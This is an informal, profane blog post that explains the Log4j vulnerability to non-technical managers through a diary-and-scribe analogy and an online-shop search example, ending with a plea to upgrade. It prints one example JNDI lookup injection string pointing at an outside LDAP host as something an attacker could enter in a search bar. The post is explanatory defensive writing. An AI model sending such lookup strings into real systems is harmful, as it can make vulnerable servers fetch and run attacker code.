Log4j vulnerability
The article title is bait. Not even sorry.
This is a a non-technical, send-me-to-your-boss, blog post to describe what the fuck is going on with log4j. I’ve tried my hardest to keep it simple, without compromising accuracy; which as displayed by various MSMs, is very very hard.
If you are technical, and you don’t have any need to send shit to your boss to convince them that it’s a good idea to upgrade, there’s a lot of blog posts out there that will do it more justice than I, so I will leave you to your googling.
Start Here If You’ve Been Sent This Post
For the sake of simplicity, I’m going to assume that you know something about technology (or at least what your developers do) and try to keep it as simple as possible, in terminology you’ll likely understand.
For clarity: The “application” might be a website, it might be a mobile app, or even something as simple as something that processes data for internal teams like HR or legal. For what it means for this blog, assume that “application” means “a digital program that processes data”.
If you have been sent this blog post by one of your software engineers, it’s most likely that some of your logging is running on anything that is even remotely tied to log4j, and if you do not sense some tensing of your anus, you should be very concerned.
What This Might Look Like In the Real World
CIA guy has been given orders to write down every command and decision he makes to a top secret diary. Said diary is handed in to a scribe at the end of the day, and the scribe copies to another book to collate all of the CIA guys’ diaries together into one place.
CIA guy receives the command:
Log this in your diary: ${scribeDo:corner-shop.com/half-naked-people-edition-53}
CIA guy writes ${scribeDo:corner-shop.com/half-naked-people}
into his diary.
The diary is given to the scribe at the end of the day.
The scribe sees ${scribeDo:corner-shop.com/half-naked-people}
and thinks “Oh, I know what I should put here”.
The scribe goes to the corner shop, buys a copy of half-naked-people, and copies it word for word into the journal , replacing where the CIA guy wrote ${scribeDo:corner-shop.com/half-naked-people}
.
Whilst the scribe copies the information of half-naked-people
, they also read it and do whatever it is they are told to do in the words; So if the page says “Send all the copies of the top secret diaries to the corner shop”; the scribe grabs all copies of the diaries and walks them down to the cornershop, hands them in, comes back, closes the new journal, rubs their hands together and thinks “job….done…”. All without ever questioning the instructions.
This is a pretty dumbed-down example of what is happening right now, but it spells out the simplicity of this vulnerability. But read further for a more in depth explanation, attempting to be non-technical.
Wtf is “Logging”?
Simply put: “Logging” is a record of what an application does (should do) when it does something important happens inside an application, or when it makes a decision. If a developer has asked a bit of their code to do a particular thing, and wants to know “why did my application do this other thing”, the logs should tell them why.
Every time their code decides “I need to do this”, it should log to say “I did this, because I got that”. It’s essentially a monologue of the application as it works, describing what it’s doing and why it’s doing it.
Imagine the “logging” as a diary for the application, and the application can write whatever it wants to the diary so that developers can see what happened when.
The diary might consist of multiple other applications; so where an application used to just log locally, it now (most likely) logs to an external service to collate all useful information from multiple applications in a central place. Usually, to collate these entries, a seperate service is used.
Put simply, imagine that all the diary entries that come from an application are relayed to a scribe who writes them down on behalf of the application. The scribe, in this situation is log4j.
An Example
In this example we will use an ecommerce website as our “application”, because we’ve all used ASOS or some other shit before.
A customer comes to the website and searches for “superdry jacket”. Your “application” (i.e. the website) will return results based on the customers search, which is grand! However in the background, what the customer doesn’t see, is that it’s processed a large amount of data to fetch out all relevant pages for “superdry jacket”. It has most likely received this request from the customer and written to its logs to say something like this:
Customer searched for ‘superdry jacket’
123 results found - sending to client
Said customer gets the pages; your application has logs so a developer can see what was searched for when; and if anything goes wrong in the middle, you can see that too.
What your developer is probably doing is something called “string interpolation”, where the code itself “fills in the gaps” in the logs so that the correct information is show. A (somewhat pythonic) example of this might be so:
log(“Customer searched for ‘{$search_from_customer}’”
This will ‘inject’ the value superdry jacket
into the log line, such that when the diary entry is filled out it will say:
Customer searched for ‘superdry jacket’
This is stupendously useful for debugging, because if someone searched for !@$#^GGB
and it returns strange results, you can look into why this is happening and simulate it on the development environment without interfering with customer requests.
The Vulnerability
Log4j presents multiple usefuls to help developers with their logging. The usefulness of said features is somewhat up for debate, but the feature exists because someone wanted it, so that’s where we are 🤷♂️ As part of this, log4j started interpreting and interpolating log lines itself. So where a developer tells the application to log the following….
Customer searched for ‘superdry jacket’
log4j interprets this as it “receives” the log line, and tries to format it itself.
So where I said above that the scribe is log4j
, the scribe receives a piece of information from the website to log to the diary, it thinks “well, there’s some stuff here that I can fill in, so I will”. Which may or may not be useful to you; but if not, and as with the case of a lot of people on the internet, you probably didn’t even know it was happening.
Lets say a customer searches for the following:
${jndi:ldap://myldapurl.com:1389/a}
What will happen, within the application as describe above, is:
log(“Customer searched for ‘{$search_from_customer}’”
Which will log this:
Customer searched for ‘${jndi:ldap://myldapurl.com:1389/a}’
Your logging platform (the scribe that uses log4j
), will see this and think “ahh, yes, JNDI - I can help here”, and try to fill in the gaps.
Servers?
As a bit of an interlude to what I’m describing above, it’s time we discussed servers.
Simply, your applications run on a server, and your servers are physical hardware that are essentially just computers.
These computers usually have internet access so that legitimate stuff can be downloaded from legitimate sources to allow them to do their job. The places where applications run having internet access to everthing is pretty normal, as usually you don’t expect anything coming from the server to be non-legitimate, because your servers are the things making the request.
Because you control it… right? You decide what requests it makes our to the internet… You know what its doing and why it’s doing it… right?
Wrong!
With this vulnerability, when the scribe (log4j) receives this request, it tries to be helpful and sees "${jndi:ldap://myldapurl.com:1389/a}
” and thinks “I’ll try and fill in the gaps here”, and does a request to myldapurl.com
When it makes that lookup, it can make that request to anywhere (given the right permissions).
If the “customer”, who we’ll now call “attacker”, has put this into a search bar and your vulnerable version of the scribe (log4j) receives it, it will attempt to “be helpful” and fill the bit of the log in with stuff that it has been told to fill in.
That request can return pretty much any information, and when it does, it will be executed on the server that receives it. That means that anything the attacker wants to make your severs do, they can do with a very simple request - even as simple as filling out a search bar - That’s not hyperbole.
In Summary
Upgrade your log4j. If your developer is saying “we need to upgrade log4j cus we’re insecure m8”, they’re not talking out of their bum… upgrade your log4j.
Log4j is used extensively throughout the industry, whether it be external providers, ELK stack, java applications, or anything inbetween… it’s a heavily used logging package, and it probably the biggest vulnerability I’ve seen in years in terms of it’s extensive use. If you haven’t already asked your providers to upgrade, or upgraded yourself, you almost certainly should.
stay safe.
UPDATE:
log4j released a fix for 2.15.0 to fix this. 2.15.0 is also not safe, and 2.16.0 has been released.
2.16.0 is also not safe, and 2.17.0 has been released.